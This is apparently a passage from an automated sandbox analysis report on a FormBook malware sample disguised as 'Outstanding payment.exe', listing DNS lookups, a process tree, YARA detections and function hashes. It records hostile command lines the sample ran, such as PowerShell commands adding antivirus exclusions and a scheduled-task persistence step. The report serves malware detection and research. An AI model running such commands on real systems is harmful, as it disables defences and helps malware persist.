Jan 16, 2025 06:37:59.826781988 CET	1.1.1.1	192.168.2.5	0x9a5f	Name error (3)	www.elnqdjc.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:19.045804024 CET	1.1.1.1	192.168.2.5	0x50e	Name error (3)	www.8oosnny.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:39.376235008 CET	1.1.1.1	192.168.2.5	0x2556	Name error (3)	www.nfluencer-marketing-13524.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:59.780914068 CET	1.1.1.1	192.168.2.5	0xb293	Name error (3)	www.atidiri.fun	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:39:20.539736986 CET	1.1.1.1	192.168.2.5	0x4ddd	Name error (3)	www.otelhafnia.info	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:39:41.547138929 CET	1.1.1.1	192.168.2.5	0x3a1a	No error (0)	www.kkkk.shop		121.254.178.252	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:40:01.454832077 CET	1.1.1.1	192.168.2.5	0x73af	Name error (3)	www.aja168e.live	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:40:42.406032085 CET	1.1.1.1	192.168.2.5	0xe248	Name error (3)	www.lphatechblog.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:41:02.897650003 CET	1.1.1.1	192.168.2.5	0xf4b5	Name error (3)	www.oftware-download-92806.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:41:24.004867077 CET	1.1.1.1	192.168.2.5	0x70f3	Name error (3)	www.behm.info	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	00:36:58
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\Outstanding payment.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Outstanding payment.exe"
Imagebase:	0x610000
File size:	840'704 bytes
MD5 hash:	43DC8C62E9343EB01C3FFB53390E2A55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"
Imagebase:	0x560000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"
Imagebase:	0x560000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp"
Imagebase:	0xb20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:36:59
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:37:00
Start date:	16/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc30000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:37:01
Start date:	16/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.4544744783.00000000118C5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	00:37:01
Start date:	16/01/2025
Path:	C:\Users\user\AppData\Roaming\iBSWjb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iBSWjb.exe
Imagebase:	0xf40000
File size:	840'704 bytes
MD5 hash:	43DC8C62E9343EB01C3FFB53390E2A55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:37:02
Start date:	16/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:37:04
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp"
Imagebase:	0xb20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:37:04
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:37:04
Start date:	16/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xbd0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:37:04
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	00:37:05
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\NETSTAT.EXE"
Imagebase:	0xf60000
File size:	32'768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:37:08
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:37:08
Start date:	16/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	171
Total number of Limit Nodes:	8

Executed Functions

Function 01093470 Relevance: 4.1, Strings: 3, Instructions: 302
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-oM, xrefs: 010937C5
3Y, xrefs: 0109364E
-oM, xrefs: 010937CC

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: -oM$-oM$3Y
API String ID: 0-1950688054
Opcode ID: 28f9b30c24dfa5c689eeba0790e1f5e9103468ddef730722b399ba74c52ac5e4
Instruction ID: 929674d39a478b38b79c52f496fa9151d1ebe5e1f93cb7d55c8cf378eb99aab5
Opcode Fuzzy Hash: 28f9b30c24dfa5c689eeba0790e1f5e9103468ddef730722b399ba74c52ac5e4
Instruction Fuzzy Hash: 4FD14774E0120ADFCB04CFA9D4908AEFBB2FF89300B55D559D456AB315C734AA42CFA4

Function 0109345C Relevance: 2.8, Strings: 2, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3Y, xrefs: 0109364E
-oM, xrefs: 010937CC

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: -oM$3Y
API String ID: 0-673696507
Opcode ID: a2cc520a38ef2a4e7a2bf5814b91876b46b5eb7daa6c86fd23677827256493b7
Instruction ID: 93a1a768c175ee2a0bf2b9511256047dc0bf819c2402601a51b43a0707b5bf54
Opcode Fuzzy Hash: a2cc520a38ef2a4e7a2bf5814b91876b46b5eb7daa6c86fd23677827256493b7
Instruction Fuzzy Hash: 7ED14474E0120ADFCB04CFA9C4908AEFBB2FF89300B15D559D456AB315D734AA42CFA0

Function 0B2F0AD0 Relevance: 2.8, Strings: 2, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 0B2F0D70
Te]q, xrefs: 0B2F0BD9

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 10a5a3e2f91cb7aa2192570777aeb4a88584393affb3a7f2bf301387e3527f45
Instruction ID: 283bde4732811333b26407536e968ede1dce1c248d2aa149d8de3f68f681e930
Opcode Fuzzy Hash: 10a5a3e2f91cb7aa2192570777aeb4a88584393affb3a7f2bf301387e3527f45
Instruction Fuzzy Hash: BFB11674E1421A8FDB08CFE9C984ADEFBF2FF89300F24856AD915AB215D7706912CB50

Function 0109134B Relevance: 2.7, Strings: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 010915DC
Te]q, xrefs: 01091431

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 150feb5cba841b4de9cfe17e6b3a95902d95d5c6ccb84a452787d4ac55ea4ab4
Instruction ID: 71bc651d7bdda85a3171ab0c0f8f748c13fa191609759a8f844be3fde00292ad
Opcode Fuzzy Hash: 150feb5cba841b4de9cfe17e6b3a95902d95d5c6ccb84a452787d4ac55ea4ab4
Instruction Fuzzy Hash: EBA11570E0120ACFCB48CFA9C4516DEBBF2FF89310F24846AE455AB265E7359942CF54

Function 0B2F6010 Relevance: 2.7, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\~$, xrefs: 0B2F6140
or, xrefs: 0B2F6076

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: \~$$or
API String ID: 0-2796768027
Opcode ID: 6a40978df602874b7923ed7e499aeed1210712eab9897a1ab49ee3a1265677a1
Instruction ID: 7305794051c3783956fc4441cdc987d22c66c544bf193669199693936b899bf7
Opcode Fuzzy Hash: 6a40978df602874b7923ed7e499aeed1210712eab9897a1ab49ee3a1265677a1
Instruction Fuzzy Hash: 288106B4E2520A9BCB04CFA6D5855AEFBF2FF89310F20C42AE516A7354E7749A41CF50

Function 010913C8 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 010915DC
Te]q, xrefs: 01091431

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 285e0e33617a46be39f7a99dc8db911cd3138d6955e60d70155a6b1bcd47fbaf
Instruction ID: a264f5482499669b9b9e2a0a4eec3c9b208ec672908fda7cfc1aca16f72a20ee
Opcode Fuzzy Hash: 285e0e33617a46be39f7a99dc8db911cd3138d6955e60d70155a6b1bcd47fbaf
Instruction Fuzzy Hash: 4B81A374E00219CFDF08CFAAC5946DDBBB2BF89310F14852AE515AB354DB319945CF64

Function 0B2F0B70 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 0B2F0D70
Te]q, xrefs: 0B2F0BD9

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 90adbb498e365e7ff4a8f1e370f9b6f2de179eae474b349cef8b27e19281c23d
Instruction ID: 7625f685bc7b4d6f80092cd0b5f65682055767890ca5d58613f0feedbfa45c9a
Opcode Fuzzy Hash: 90adbb498e365e7ff4a8f1e370f9b6f2de179eae474b349cef8b27e19281c23d
Instruction Fuzzy Hash: 7581D2B4E102198FDB48CFE9C984A9EFBF2FF89300F10852AE919AB354D7345906CB50

Function 0B2F6020 Relevance: 2.7, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\~$, xrefs: 0B2F6140
or, xrefs: 0B2F6076

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: \~$$or
API String ID: 0-2796768027
Opcode ID: d41b44585ff29d6e97b5a4fa1898d4962a3e7e8f2a5e96017773a97d820b1e2a
Instruction ID: 5867b0ac686600d0ef0075865954c4aa0235141eb0aec073e4eaf8e7359f7411
Opcode Fuzzy Hash: d41b44585ff29d6e97b5a4fa1898d4962a3e7e8f2a5e96017773a97d820b1e2a
Instruction Fuzzy Hash: 126107B4E2520A9BCB04CFA6D5855AEFBF2FF89300F20D42AD526A7354D7349A41CF50

Function 0B2F7988 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

?w=>, xrefs: 0B2F7C64

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: 28808643a3db10e06d97bf44e751bef2708f2678d0c1e7723aafe6812983e210
Instruction ID: f21dde3ac85d419acce2974d44510bc0b3ed1b3409ef462fbad03f3562e291f7
Opcode Fuzzy Hash: 28808643a3db10e06d97bf44e751bef2708f2678d0c1e7723aafe6812983e210
Instruction Fuzzy Hash: C8B10670E1521ADBEB18CFAAD8805DEFBB2FF89300F10956AD515BB264D7749A02CF10

Function 0B2F7998 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

?w=>, xrefs: 0B2F7C64

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: 270ea5dbb11bff6d0e0decdff35865cc7b40ccd5743b56ce617ba218950ae11f
Instruction ID: 62252728cebdf42a342f6ef9606c31589978d98b19aca739491304da3d9afa7c
Opcode Fuzzy Hash: 270ea5dbb11bff6d0e0decdff35865cc7b40ccd5743b56ce617ba218950ae11f
Instruction Fuzzy Hash: B0B1F770D1521ADBEB18CFAAD8805DEFBB2FF89300F10956AD515BB264DB749A02CF50

Function 0B2F55F0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

5{, xrefs: 0B2F582A

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: 0949c2c5b2fcb24a0c7956cf79b5fcc3902ec155064165d0c289ea57a2028e38
Instruction ID: 47f1fd646a5efc8e1a13f562e8f02ab562aa8fc30dc7035e239de39210274a53
Opcode Fuzzy Hash: 0949c2c5b2fcb24a0c7956cf79b5fcc3902ec155064165d0c289ea57a2028e38
Instruction Fuzzy Hash: F0B14BB4E1120ADFCB04DFA9D5858AEFBF2FF89310F14846AD516AB364D7349A01CB61

Function 0B2F5631 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

5{, xrefs: 0B2F582A

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: ba1ec496bda8fa4f1a48ea88f8a6c04145bf7833e6f2e7fa625c9d4b5ae43a46
